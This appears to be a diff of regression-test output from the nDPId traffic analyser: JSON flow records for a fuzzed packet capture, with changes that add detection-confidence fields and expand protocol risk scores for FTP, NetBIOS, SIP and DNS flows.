-00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00825{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00609{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471001263,"flow_last_seen":1120471001263,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.234.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120470796941,"flow_last_seen":1120471094413,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10425,"flow_avg_l4_payload_len":453,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00821{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1593,51 +1595,51 @@
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470983999,"flow_last_seen":1120470993243,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471001245,"flow_last_seen":1120471001245,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120471019307,"flow_last_seen":1120471028313,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471036315,"flow_last_seen":1120471036317,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
